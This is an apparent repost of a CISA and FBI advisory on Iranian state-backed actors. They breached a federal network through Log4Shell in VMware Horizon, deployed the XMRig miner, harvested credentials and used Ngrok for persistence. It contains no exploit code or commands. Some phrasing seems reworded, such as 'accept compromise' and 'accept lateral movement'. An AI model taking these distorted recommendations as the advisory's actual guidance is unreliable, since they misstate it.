Digital 4683519 1280

Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester

From mid-June to mid-July 2022, CISA conducted an incident response discussion at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. During the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved sideways to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies. on multiple hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

CISA and FBI release this Cyber ​​Security Advisory (CSA) that provides suspected Iranian government-sponsored actors’ tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

CISA and FBI encourage all organizations with affected VMware systems that have not applied immediately available patches or fixes to accept compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to accept lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigation section of this CSA to protect against similar malicious cyber activities.

For more information on Iranian government-sponsored Iranian malicious cyber activities, see CISA’s Iran Cyber ​​Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.

Read more at CISA

Related Posts